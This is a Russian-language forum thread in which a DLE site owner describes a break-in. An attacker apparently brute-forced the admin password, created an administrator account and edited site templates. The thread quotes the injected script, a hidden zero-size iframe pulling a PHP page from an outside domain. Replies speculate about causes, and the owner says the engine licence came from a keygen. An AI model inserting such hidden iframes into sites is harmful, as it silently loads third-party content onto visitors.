Дыра в dle ?

копался случайно на своём сайте в разделе пользователей, и случайно обнаружил, что один из пользователей зарегил себе логин user и каким то образом оказался с правами администратора. Как такое может быть? и как он это сделал? получается есть какой-то баг, ведь под админом можно сделать всё что угодно .... https://yadi.sk/i/VjFrtigQ3ADZzm
и как себя обезопасить?
более того начал проверять ftp клиентом, какие файлы были редактированы, оказалось чел залез в fullstory.tpl и navigation.tpl и вставил следующий код
<script>document.write('<iframe src="http://avnt.ru/swf.php" width="0" height="0" frameborder="0"></iframe>');</script>

 

начал разбираться дальше, чел видимо подобрал пароль к логину admin, затем создал пользователя user, зачем-то и изменил 3 файла. https://yadi.sk/i/odGrvlAM3ADiiz
потом начал смотреть Список действий в админпанели , логин admin я давно не пользуюсь, а по нему кто то периодически логинился.

 

@BROKER, открыл регу для постоянников, вырубил им рекламу, подумал что так будет лучше. Но они то брутили логины админа, поэтому открыта или закрыта рега уже не имеет значения

 

спасибо за новое слово

 

@BROKER, раскрывай дальше как её сделать, так, что бы была видимость авторизации?

 

проверил остальные сайты, каждые 5-10 минут, идёт попытка взлома-подбора логин-пароля. это какой-то пизнец. людям нех заняться, лучше бы бабки зарабатывали (((

 

там 100% добавлен код мобильной рекламы на вапклик!!!!
чисть файлы. смотри прокрутку в право!

 

Двиг лизензия, или нуленый/хуеленый?

 

Пароль: 1111? 0000? или qwerty? М.б. просто когда-то, дал кому-то доступ и забыл сменить пассы?

 

ночью пытались снова проникнуть, но меры принял
странно что один ip с которого лезут, хостинги разные были у сайтов, переехал буквально как пару дней на общий. судя по регам, до переезда уже заходили в админку. совпадение ли ...

 

@Driple,

 

@damir, лицензия с кейгеном